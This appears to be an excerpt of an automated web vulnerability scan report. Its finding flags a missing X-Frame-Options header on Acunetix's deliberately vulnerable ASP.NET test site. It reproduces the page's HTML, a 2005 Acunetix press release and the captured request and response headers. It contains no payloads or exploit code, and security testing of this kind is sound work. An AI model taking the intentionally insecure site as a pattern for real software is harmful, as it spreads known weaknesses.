ICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 